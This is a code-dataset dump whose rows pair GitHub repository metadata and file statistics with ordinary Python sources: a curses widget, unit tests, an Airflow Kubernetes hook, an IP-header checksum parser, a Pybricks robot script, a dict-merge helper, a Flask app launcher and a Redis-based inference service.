|
thieman/mongo_commander
|
407cccb1abdf16b3eb07f813f5dd5d9152930f4d
|
[
"MIT"
] | null | null | null |
"""Widgets abstract out common View rendering patterns like displaying
a list of logging messages or a bar chart. They typically take the ClusterData
object, a window, and a list of keys they should care about from ClusterData.
They then draw directly onto the window."""
from operator import itemgetter
from .curses_util import movedown, movex
class Widget(object):
def __init__(self, data):
self.data = data
self.source_keys = []
def apply_to_window(self, window):
raise NotImplementedError()
class StreamWidget(Widget):
"""Display line-by-line text data from a stream."""
def _gather_data(self):
return reduce(list.__add__, map(lambda key: self.data.get(key, []), self.source_keys))
def apply_to_window(self, window):
data_for_render = self._gather_data()
if not data_for_render:
return
window.move(0, 0)
first_jump = len(data_for_render[0]['time'].strftime('%c')) + 3
second_jump = first_jump + max(map(len, map(itemgetter('node_name'), data_for_render))) + 3
for datum in sorted(data_for_render, key=itemgetter('time'))[-10:]:
window.addstr('{} - '.format(datum['time'].strftime('%c')))
movex(window, first_jump)
window.addstr('{} - '.format(datum['node_name']))
movex(window, second_jump)
window.addstr(str(datum['data']).strip())
movedown(window, x=0)
| 39.162162
| 99
| 0.655625
| 195
| 1,449
| 4.687179
| 0.471795
| 0.038293
| 0.071116
| 0.037199
| 0.087527
| 0.087527
| 0.087527
| 0.087527
| 0.087527
| 0
| 0
| 0.007092
| 0.221532
| 1,449
| 36
| 100
| 40.25
| 0.803191
| 0.214631
| 0
| 0.08
| 0
| 0
| 0.042591
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.08
| 0.04
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddfe5b6a2bd63f44708eacd4d1f196837c88804e
| 958
|
py
|
Python
|
tests/feature_propagation_test.py
|
emalgorithm/feature-propagation
|
de9ec54d5c035abe8d52d6ac4079156cc537e489
|
[
"Apache-2.0"
] | 20
|
2022-03-09T00:06:23.000Z
|
2022-03-18T09:59:36.000Z
|
tests/feature_propagation_test.py
|
emalgorithm/feature-propagation
|
de9ec54d5c035abe8d52d6ac4079156cc537e489
|
[
"Apache-2.0"
] | 2
|
2022-03-14T22:00:58.000Z
|
2022-03-21T02:11:50.000Z
|
tests/feature_propagation_test.py
|
twitter-research/feature-propagation
|
af2733589eab4023fca67f7e71a3b46ddbbea8cd
|
[
"Apache-2.0"
] | 3
|
2022-03-09T05:36:53.000Z
|
2022-03-11T13:53:45.000Z
|
"""
Copyright 2020 Twitter, Inc.
SPDX-License-Identifier: Apache-2.0
"""
import unittest
import math
import torch
from feature_propagation import FeaturePropagation
class TestFeaturePropagation(unittest.TestCase):
def test_feature_propagation(self):
X = torch.Tensor([1 / 2, 0, 1 / 3, 0]).reshape(-1, 1)
node_mask = torch.BoolTensor([True, False, True, False])
edge_index = torch.LongTensor(
[[0, 2], [2, 0], [0, 3], [3, 0], [1, 2], [2, 1], [1, 3], [3, 1], [2, 3], [3, 2]]
).T
expected_X_propagated = torch.Tensor(
[[1 / 2], [(1 / math.sqrt(6)) * (1 / 3)], [1 / 3], [(1 / 3) * (1 / 3) + (1 / math.sqrt(6)) * (1 / 2)]]
)
fp = FeaturePropagation(num_iterations=1)
X_propagated = fp.propagate(x=X, edge_index=edge_index, mask=node_mask)
self.assertTrue(torch.allclose(expected_X_propagated, X_propagated))
if __name__ == "__main__":
unittest.main()
| 29.9375
| 114
| 0.59499
| 132
| 958
| 4.143939
| 0.386364
| 0.021938
| 0.021938
| 0.021938
| 0.053016
| 0.016453
| 0.016453
| 0
| 0
| 0
| 0
| 0.069293
| 0.231733
| 958
| 31
| 115
| 30.903226
| 0.673913
| 0.066806
| 0
| 0
| 0
| 0
| 0.009029
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 1
| 0.052632
| false
| 0
| 0.210526
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddff02eefab9048a47d0d1a8a7f90b6f135ea01d
| 2,427
|
py
|
Python
|
tests/test_file.py
|
gaiadhi/traDSSAT
|
1d5615dbd4965bab5c2740134c706c1748ff5fae
|
[
"MIT"
] | 6
|
2020-10-05T11:50:37.000Z
|
2022-02-24T08:36:22.000Z
|
tests/test_file.py
|
gaiadhi/traDSSAT
|
1d5615dbd4965bab5c2740134c706c1748ff5fae
|
[
"MIT"
] | 23
|
2018-11-08T19:16:36.000Z
|
2021-07-20T23:34:18.000Z
|
tests/test_file.py
|
gaiadhi/traDSSAT
|
1d5615dbd4965bab5c2740134c706c1748ff5fae
|
[
"MIT"
] | 9
|
2018-11-06T21:04:07.000Z
|
2021-06-19T05:43:24.000Z
|
import os
import unittest
import numpy.testing as npt
from tradssat import SoilFile, WTHFile, MTHFile, ExpFile, CULFile, ECOFile, DSSATResults
from tradssat.out import SoilTempOut, SoilNiOut, SummaryOut, PlantGroOut, ETOut, SoilWatOut, MulchOut
from tests.utils import _test_read, _test_write, rsrcs, read_json, get_ref_var
input_classes = [SoilFile, WTHFile, MTHFile, ExpFile, CULFile, ECOFile]
rsrcs_out = os.path.join(rsrcs, 'Out')
output_classes = [PlantGroOut, SoilNiOut, SoilTempOut, SoilWatOut, MulchOut, ETOut]
final_out_classes = [SummaryOut]
# Inputs must be read and written
class TestInputs(unittest.TestCase):
def test_read(self):
for inp_class in input_classes:
with self.subTest(inp_class.__name__):
_test_read(inp_class, folder=rsrcs, testcase=self)
def test_write(self):
for inp_class in input_classes:
with self.subTest(inp_class.__name__):
_test_write(inp_class, rsrcs, testcase=self)
# Outputs are only read, not written
class TestOutputs(unittest.TestCase):
def test_read(self):
for out_class in output_classes:
with self.subTest(out_class.__name__):
_test_read(out_class, folder=rsrcs_out, testcase=self)
class TestFinalOutputs(unittest.TestCase):
def test_read(self):
for final_out_class in final_out_classes:
with self.subTest(final_out_class.__name__):
_test_read(final_out_class, folder=rsrcs_out, testcase=self)
class TestOutHeader(unittest.TestCase):
def setUp(self):
self.path = f'{rsrcs_out}/Cassava/headerTest'
self.ref = read_json(f'{self.path}/_ref_PlantGro.OUT.json')
self.instance = DSSATResults(self.path)
def test_entire_array(self):
actual = self.instance.get_value("HWAD", trt=1, run=2)
expected = get_ref_var(self.ref, "HWAD", trt=1, run=2)
npt.assert_equal(actual, expected)
def test_time_specific(self):
actual = self.instance.get_value("TWAD", trt=2, run=4, t=194, at='DAP')
expected = 9394
npt.assert_equal(actual, expected)
def test_wrong_values(self):
"""
Header var 'run' is unique for each simulation.
For the current ref file the correct input is: 'trt = 2' and 'run = 4'
"""
with npt.assert_raises(StopIteration):
self.instance.get_value("LAID", trt=2, run=2)
| 35.173913
| 101
| 0.689328
| 324
| 2,427
| 4.916667
| 0.324074
| 0.035154
| 0.047709
| 0.055242
| 0.359699
| 0.319523
| 0.227872
| 0.124294
| 0.07533
| 0.07533
| 0
| 0.008891
| 0.212196
| 2,427
| 68
| 102
| 35.691176
| 0.824268
| 0.076638
| 0
| 0.2
| 0
| 0
| 0.038949
| 0.028986
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0.177778
| false
| 0
| 0.133333
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb00206f76f0396ffc60257de95610a6a4ddebea
| 2,840
|
py
|
Python
|
airflow_spark_k8s/hooks/kubernetes.py
|
roitvt/airflow-spark-k8s
|
cd2a0ec63e1fb9ad43beb725a65e4d65a4d85206
|
[
"Apache-2.0"
] | 2
|
2020-04-26T11:12:11.000Z
|
2020-09-14T16:36:42.000Z
|
airflow_spark_k8s/hooks/kubernetes.py
|
roitvt/airflow-spark-k8s
|
cd2a0ec63e1fb9ad43beb725a65e4d65a4d85206
|
[
"Apache-2.0"
] | 1
|
2020-04-14T18:20:20.000Z
|
2020-04-14T18:26:27.000Z
|
airflow_spark_k8s/hooks/kubernetes.py
|
roitvt/airflow-spark-k8s
|
cd2a0ec63e1fb9ad43beb725a65e4d65a4d85206
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tempfile
from kubernetes import client, config
from airflow.hooks.base_hook import BaseHook
class KubernetesHook(BaseHook):
"""
Creates Kubernetes API connection.
:param conn_id: the connection to Kubernetes cluster
"""
def __init__(
self,
conn_id="kubernetes_default"
):
self.connection = self.get_connection(conn_id)
self.extras = self.connection.extra_dejson
def get_conn(self):
"""
Returns kubernetes api session for use with requests
"""
if self._get_field(("in_cluster")):
self.log.debug("loading kube_config from: in_cluster configuration")
config.load_incluster_config()
elif self._get_field("kube_config") is None or self._get_field("kube_config") == '':
self.log.debug("loading kube_config from: default file")
config.load_kube_config()
else:
with tempfile.NamedTemporaryFile() as temp_config:
self.log.debug("loading kube_config from: connection kube_config")
temp_config.write(self._get_field("kube_config").encode())
temp_config.flush()
config.load_kube_config(temp_config.name)
temp_config.close()
return client.ApiClient()
def get_namespace(self):
"""
Returns the namespace that defined in the connection
"""
return self._get_field("namespace", default="default")
def _get_field(self, field_name, default=None):
"""
Fetches a field from extras, and returns it. This is some Airflow
magic. The kubernetes hook type adds custom UI elements
to the hook page, which allow admins to specify in_cluster configutation, kube_config, namespace etc.
They get formatted as shown below.
"""
full_field_name = 'extra__kubernetes__{}'.format(field_name)
if full_field_name in self.extras:
return self.extras[full_field_name]
else:
return default
| 37.866667
| 109
| 0.679225
| 364
| 2,840
| 5.137363
| 0.409341
| 0.053476
| 0.032086
| 0.030481
| 0.091444
| 0.059358
| 0.059358
| 0.041711
| 0
| 0
| 0
| 0.001866
| 0.24507
| 2,840
| 74
| 110
| 38.378378
| 0.870336
| 0.425
| 0
| 0.060606
| 0
| 0
| 0.155482
| 0.013953
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.090909
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb00a41d3f7f3756cedf6911bccc4f0b80b7ea08
| 325
|
py
|
Python
|
tests/test_main.py
|
david-kirby/gh-action-docs
|
b231d14b0b629b4f308eba6cff50a35a98c9f521
|
[
"MIT"
] | 1
|
2021-03-21T14:31:46.000Z
|
2021-03-21T14:31:46.000Z
|
tests/test_main.py
|
david-kirby/gh-action-docs
|
b231d14b0b629b4f308eba6cff50a35a98c9f521
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
david-kirby/gh-action-docs
|
b231d14b0b629b4f308eba6cff50a35a98c9f521
|
[
"MIT"
] | null | null | null |
import logging
import unittest
from src.gh_action_docs import app
logging.disable(logging.CRITICAL)
class TestActionFileCheck(unittest.TestCase):
def test_no_files_found(self):
results = app.check_for_file("not-existent-file")
self.assertFalse(results)
if __name__ == "__main__":
unittest.main()
| 20.3125
| 57
| 0.747692
| 41
| 325
| 5.560976
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156923
| 325
| 15
| 58
| 21.666667
| 0.832117
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.3
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0391e58115974e49fe694882ae6ffe7af0d172
| 2,330
|
py
|
Python
|
5.4/IPheaderChecksum.py
|
Fecer/Computer-Networks
|
fe4fc5bd1af7f2957aee407675cb018fa83c6735
|
[
"MIT"
] | null | null | null |
5.4/IPheaderChecksum.py
|
Fecer/Computer-Networks
|
fe4fc5bd1af7f2957aee407675cb018fa83c6735
|
[
"MIT"
] | null | null | null |
5.4/IPheaderChecksum.py
|
Fecer/Computer-Networks
|
fe4fc5bd1af7f2957aee407675cb018fa83c6735
|
[
"MIT"
] | null | null | null |
from xml.dom.minidom import parse
def printLine():
print('------------------------------------------')
if __name__ == '__main__':
# 获取参数
DOMTree = parse("config.xml")
collection = DOMTree.documentElement
header = collection.getElementsByTagName('header')[0].childNodes[0].data
printLine()
print('Header:\n', header)
printLine()
version = header[:1]
print('Version:\n', version)
printLine()
headerLen = header[1:2]
print('Header Length:\n', headerLen)
printLine()
service = header[2:4]
print('Differentiated Services Field:\n', service)
printLine()
totalLen = header[4:8]
totalLen = int(totalLen, 16)
print('Total Length:\n', totalLen)
printLine()
id = header[8:12]
id = int(id, 16)
print('Identification:\n', id)
printLine()
flags = header[12:16]
flags = int(flags, 16)
print('Flags and Offset:\n', flags)
printLine()
ttl = header[16:18]
ttl = int(ttl, 16)
print('Time to live:\n', ttl)
printLine()
protocol = header[18:20]
protocol = int(protocol, 16)
print('Protocol:\n', protocol)
printLine()
checksum = header[20:24]
checksum = int(checksum, 16)
print('Checksum in header:\n', checksum, '(' + header[20:24] + ')')
printLine()
source = header[24:32]
a = str(int(source[0:2], 16))
b = str(int(source[2:4], 16))
c = str(int(source[4:6], 16))
d = str(int(source[6:8], 16))
print('Source IP:\n', a+'.'+b+'.'+c+'.'+d)
printLine()
dest = header[32:40]
a = str(int(dest[0:2], 16))
b = str(int(dest[2:4], 16))
c = str(int(dest[4:6], 16))
d = str(int(dest[6:8], 16))
print('Destination IP:\n', a + '.' + b + '.' + c + '.' + d)
printLine()
a = int(header[0:4], 16)
b = int(header[4:8], 16)
c = int(header[8:12], 16)
d = int(header[12:16], 16)
e = int(header[16:20], 16)
f = int(header[24:28], 16)
g = int(header[28:32], 16)
h = int(header[32:36], 16)
i = int(header[36:40], 16)
res1 = hex(a + b + c + d + e + f + g + h + i)
opnd1 = str(res1)[2:3]
opnd2 = str(res1)[3:7]
res2 = int(opnd1, 16) + int(opnd2, 16)
all = int('ffff', 16)
res2 = all - res2
checksum2 = res2
print('Checksum by calculated:')
print('0x%04x' % checksum2)
| 24.526316
| 76
| 0.546781
| 332
| 2,330
| 3.813253
| 0.262048
| 0.063981
| 0.037915
| 0.009479
| 0.077409
| 0.077409
| 0.025276
| 0
| 0
| 0
| 0
| 0.090495
| 0.245923
| 2,330
| 94
| 77
| 24.787234
| 0.630051
| 0.001717
| 0
| 0.173333
| 0
| 0
| 0.129518
| 0.018072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013333
| false
| 0
| 0.013333
| 0
| 0.026667
| 0.386667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb083e9034d5ab0e5ac6315a7e5ffb3f614cc66e
| 1,029
|
py
|
Python
|
tests/motors/spikebase_tank1.py
|
cschlack/pybricks-micropython
|
0abfd2918267a4e6e7a04062976ac1bb3da1f4b1
|
[
"MIT"
] | 1
|
2021-12-27T00:09:37.000Z
|
2021-12-27T00:09:37.000Z
|
tests/motors/spikebase_tank1.py
|
cschlack/pybricks-micropython
|
0abfd2918267a4e6e7a04062976ac1bb3da1f4b1
|
[
"MIT"
] | null | null | null |
tests/motors/spikebase_tank1.py
|
cschlack/pybricks-micropython
|
0abfd2918267a4e6e7a04062976ac1bb3da1f4b1
|
[
"MIT"
] | null | null | null |
from pybricks.pupdevices import Motor
from pybricks.tools import wait
from pybricks.parameters import Port, Direction
from pybricks.robotics import SpikeBase
from pybricks import version
print(version)
# Initialize base.
left_motor = Motor(Port.C)
right_motor = Motor(Port.D)
spike_base = SpikeBase(left_motor, right_motor)
# Allocate logs for motors and controller signals.
DURATION = 6000
left_motor.log.start(DURATION)
right_motor.log.start(DURATION)
spike_base.distance_control.log.start(DURATION)
spike_base.heading_control.log.start(DURATION)
# Turn in place, almost.
spike_base.tank_move_for_degrees(speed_left=250, speed_right=-247, angle=182)
# Wait so we can also log hold capability, then turn off the motor completely.
wait(100)
spike_base.stop()
# Transfer data logs.
print("Transferring data...")
left_motor.log.save("servo_left.txt")
right_motor.log.save("servo_right.txt")
spike_base.distance_control.log.save("control_distance.txt")
spike_base.heading_control.log.save("control_heading.txt")
print("Done")
| 29.4
| 78
| 0.808552
| 156
| 1,029
| 5.153846
| 0.423077
| 0.078358
| 0.079602
| 0.052239
| 0.16791
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017076
| 0.089407
| 1,029
| 34
| 79
| 30.264706
| 0.840982
| 0.179786
| 0
| 0
| 0
| 0
| 0.109785
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.217391
| 0
| 0.217391
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb097754f4efecf6545051b20dad8dee8adaa09e
| 1,136
|
py
|
Python
|
cyto/basic/_dict.py
|
sbtinstruments/cyto
|
f452562e5e9ae9d2516cd92958af6e6a2c985dcc
|
[
"MIT"
] | 5
|
2021-04-03T04:09:38.000Z
|
2021-12-17T15:05:18.000Z
|
cyto/basic/_dict.py
|
sbtinstruments/cyto
|
f452562e5e9ae9d2516cd92958af6e6a2c985dcc
|
[
"MIT"
] | 1
|
2021-04-21T17:00:29.000Z
|
2021-04-21T19:12:30.000Z
|
cyto/basic/_dict.py
|
sbtinstruments/cyto
|
f452562e5e9ae9d2516cd92958af6e6a2c985dcc
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict
def deep_update(dest: Dict[Any, Any], other: Dict[Any, Any]) -> None:
"""Update `dest` with the key/value pairs from `other`.
Returns `None`. Note that we modify `dest` in place.
Unlike the built-in `dict.Update`, `deep_update` recurses into sub-dictionaries.
This effectively "merges" `other` into `dest`.
Note that we do not recurse into lists. We treat lists like any other
non-`dict` type and simply override the existing entry in `dest` (if any).
"""
for key, other_val in other.items():
# Simple case: `key` is not in `dest`, so we simply add it.
if key not in dest:
dest[key] = other_val
continue
# Complex case: There is a conflict, so we must "merge" `dest_val`
# and `other_val`.
dest_val = dest[key]
# Given two dicts, we can simply recurse.
if isinstance(dest_val, dict) and isinstance(other_val, dict):
deep_update(dest_val, other_val)
# Any other type combination simply overrides the existing key in `dest`
else:
dest[key] = other_val
| 39.172414
| 84
| 0.634683
| 167
| 1,136
| 4.239521
| 0.419162
| 0.067797
| 0.04661
| 0.042373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.269366
| 1,136
| 28
| 85
| 40.571429
| 0.853012
| 0.557218
| 0
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0b0d61a04227b98b766bf05a1daba731f1fb99
| 2,312
|
py
|
Python
|
api_logic_server_cli/create_from_model/ui_basic_web_app_run.py
|
valhuber/ApiLogicServer
|
a4acd8d886a18d4d500e0fffffcaa2f1c0765040
|
[
"BSD-3-Clause"
] | 71
|
2021-01-23T17:34:33.000Z
|
2022-03-29T13:11:29.000Z
|
api_logic_server_cli/create_from_model/ui_basic_web_app_run.py
|
valhuber/ApiLogicServer
|
a4acd8d886a18d4d500e0fffffcaa2f1c0765040
|
[
"BSD-3-Clause"
] | 38
|
2021-01-24T21:56:30.000Z
|
2022-03-08T18:49:00.000Z
|
api_logic_server_cli/create_from_model/ui_basic_web_app_run.py
|
valhuber/ApiLogicServer
|
a4acd8d886a18d4d500e0fffffcaa2f1c0765040
|
[
"BSD-3-Clause"
] | 14
|
2021-01-23T16:20:44.000Z
|
2022-03-24T10:48:28.000Z
|
# runs ApiLogicServer basic web app:
# python ui/basic_web_app/run.py
# Export PYTHONPATH, to enable python ui/basic_web_app/run.py
import os, sys, logging
from pathlib import Path
logger = logging.getLogger()
current_path = Path(os.path.abspath(os.path.dirname(__file__)))
current_path = current_path.parent.absolute() # ui
current_path = current_path.parent.absolute() # project
project_dir = str(current_path)
sys.path.append(project_dir)
import ui.basic_web_app.config as config
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.INFO) # DEBUG, INFO, <default> WARNING, ERROR, CRITICAL
auto_log_narrow = True
if auto_log_narrow and config.SQLALCHEMY_DATABASE_URI.endswith("db.sqlite"):
formatter = logging.Formatter('%(message).120s') # lead tag - '%(name)s: %(message)s')
else:
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.propagate = True
fab_logger = logging.getLogger("flask_appbuilder")
fab_logger.setLevel(logging.WARNING)
logic_logger = logging.getLogger("logic_logger")
logic_logger.setLevel(logging.INFO)
logger.setLevel(logging.WARNING) # WARNING to reduce output, INFO for more
logger.info(f'ui/basic_web_app/run.py - project_dir: {project_dir}')
if auto_log_narrow and config.SQLALCHEMY_DATABASE_URI.endswith("db.sqlite"):
logger.warning("\nLog width reduced for readability - "
"see https://github.com/valhuber/ApiLogicServer/wiki/Tutorial#word-wrap-on-the-log\n")
# args for help
import sys
if len(sys.argv) > 1 and sys.argv[1].__contains__("help"):
print("")
print("basic_web_app - run instructions (defaults are host 0.0.0.0, port 5002):")
print(" python run.py [host [port]]")
print("")
sys.exit()
try:
logger.debug("\nui/basic_web_app/run.py - PYTHONPATH" + str(sys.path) + "\n")
# e.g., /Users/val/dev/servers/api_logic_server/ui/basic_web_app
from app import app # ui/basic_web_app/app/__init__.py activates logic
except Exception as e:
logger.error("ui/basic_web_app/run.py - Exception importing app: " + str(e))
# args to avoid port conflicts, e.g., localhost 8080
host = sys.argv[1] if sys.argv[1:] \
else "0.0.0.0"
port = sys.argv[2] if sys.argv[2:] \
else "5002"
app.run(host=host, port=port, debug=True)
| 36.125
| 105
| 0.733131
| 350
| 2,312
| 4.677143
| 0.362857
| 0.04887
| 0.067196
| 0.055589
| 0.189371
| 0.169823
| 0.103849
| 0.074527
| 0.074527
| 0.074527
| 0
| 0.014421
| 0.13019
| 2,312
| 63
| 106
| 36.698413
| 0.799602
| 0.189014
| 0
| 0.133333
| 0
| 0.022222
| 0.24275
| 0.038131
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0.088889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0e6ce0d08d8c7d2254af54405bab1d2071c99d
| 4,219
|
py
|
Python
|
elastic_inference/apps/infer_service.py
|
qzheng527/cloud-native-demos
|
e2dbcfc0d90c1972bc34a35f5d85f83f2b2b6cf6
|
[
"Apache-2.0"
] | 1
|
2020-04-06T10:11:27.000Z
|
2020-04-06T10:11:27.000Z
|
elastic_inference/apps/infer_service.py
|
qzheng527/cloud-native-demos
|
e2dbcfc0d90c1972bc34a35f5d85f83f2b2b6cf6
|
[
"Apache-2.0"
] | null | null | null |
elastic_inference/apps/infer_service.py
|
qzheng527/cloud-native-demos
|
e2dbcfc0d90c1972bc34a35f5d85f83f2b2b6cf6
|
[
"Apache-2.0"
] | 2
|
2021-01-19T21:42:08.000Z
|
2021-08-13T19:59:06.000Z
|
#!/usr/bin/python3
"""
Infer service.
It pick up single frame from frame queue and do inference. The result will be
published to stream broker like below.
+---------------------+ +---------------+ +-----------------------+
| Frame Queue (redis) | => | Infer Service | => | Stream broker (redis) |
+---------------------+ +---------------+ +-----------------------+
||
##
+--------------------------------+
| Infer Frame Speed (prometheus) |
+--------------------------------+
The infer service can be scaled by kubernete HPA(Horizontal Pod Autoscale)
dynamically according to the metrics like "drop frame speed", "infer frame speed"
"CPU usage" etc.
"""
import os
import sys
import logging
import signal
import socket
import redis
import prometheus_client as prom
# add current path into PYTHONPATH
APP_PATH = os.path.dirname(__file__)
sys.path.append(APP_PATH)
from clcn.appbase import CLCNAppBase # pylint: disable=wrong-import-position
from clcn.frame import RedisFrameQueue # pylint: disable=wrong-import-position
from clcn.stream import RedisStreamBroker # pylint: disable=wrong-import-position
from clcn.nn.inferengine import OpenVinoInferEngineTask # pylint: disable=wrong-import-position
LOG = logging.getLogger(__name__)
class InferServiceApp(CLCNAppBase):
"""
Inference service.
"""
def init(self):
LOG.info("Host name: %s", socket.gethostname())
LOG.info("Host ip: %s", socket.gethostbyname(socket.gethostname()))
self.in_queue_host = self.get_env("INPUT_QUEUE_HOST", "127.0.0.1")
self.out_broker_host = self.get_env("OUTPUT_BROKER_HOST", "127.0.0.1")
LOG.info("Input queue host: %s", self.in_queue_host)
LOG.info("Output broker host: %s", self.out_broker_host)
self.infer_type = self.get_env("INFER_TYPE", "face")
self.model_name = self.get_env("INFER_MODEL_NAME")
# MODEL_PATH env got higher priority
path = self.get_env("INFER_MODEL_PATH")
if path is not None and len(path) != 0:
self.model_dir = self.get_env("INFER_MODEL_PATH")
else:
self.model_dir = self.get_env("MODEL_DIR")
LOG.info("model dir: %s", self.model_dir)
LOG.info("model name: %s", self.model_name)
self._guage_infer_fps = prom.Gauge(
'ei_infer_fps', 'Total infererence FPS')
self._guage_drop_fps = prom.Gauge(
'ei_drop_fps', 'Drop frames for infer')
self._guage_scale_ratio = prom.Gauge(
'ei_scale_ratio', 'Scale ratio for inference, (ei_infer_fps+ei_drop_fps)/ei_infer_fps')
def run(self):
in_redis_conn = redis.StrictRedis(self.in_queue_host)
out_redis_conn = in_redis_conn
if self.in_queue_host != self.out_broker_host:
out_redis_conn = redis.StrictRedis(self.out_broker_host)
input_queue = RedisFrameQueue(in_redis_conn, self.infer_type)
out_broker = RedisStreamBroker(out_redis_conn)
out_broker.start_streams_monitor_task()
infer_task = OpenVinoInferEngineTask(input_queue, out_broker,
self._report_metric,
model_dir=self.model_dir,
model_name=self.model_name)
infer_task.start()
prom.start_http_server(8000)
def _report_metric(self, infer_fps, drop_fps, scale_ratio):
self._guage_infer_fps.set(infer_fps)
self._guage_drop_fps.set(drop_fps)
self._guage_scale_ratio.set(scale_ratio)
def start_app():
"""
App entry.
"""
app = InferServiceApp()
def signal_handler(num, _):
logging.getLogger().error("signal %d", num)
app.stop()
sys.exit(1)
# setup the signal handler
signames = ['SIGINT', 'SIGHUP', 'SIGQUIT', 'SIGUSR1']
for name in signames:
signal.signal(getattr(signal, name), signal_handler)
app.run_and_wait_task()
if __name__ == "__main__":
start_app()
| 35.158333
| 99
| 0.599194
| 504
| 4,219
| 4.742063
| 0.293651
| 0.020502
| 0.029289
| 0.040167
| 0.205021
| 0.084519
| 0.050209
| 0
| 0
| 0
| 0
| 0.006406
| 0.260014
| 4,219
| 119
| 100
| 35.453782
| 0.759129
| 0.254089
| 0
| 0
| 0
| 0
| 0.130239
| 0.012573
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.164179
| 0
| 0.253731
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0ed9b104a5cd8f1fa264f1f6318ff1bd1ed415
| 288
|
py
|
Python
|
P25010-Guangzhou-Jiachengwu/week07/ex_filecopy.py
|
xiaohh2016/python-25
|
8981ba89bfb32754c3f9c881ee8fcaf13332ce51
|
[
"Apache-2.0"
] | 1
|
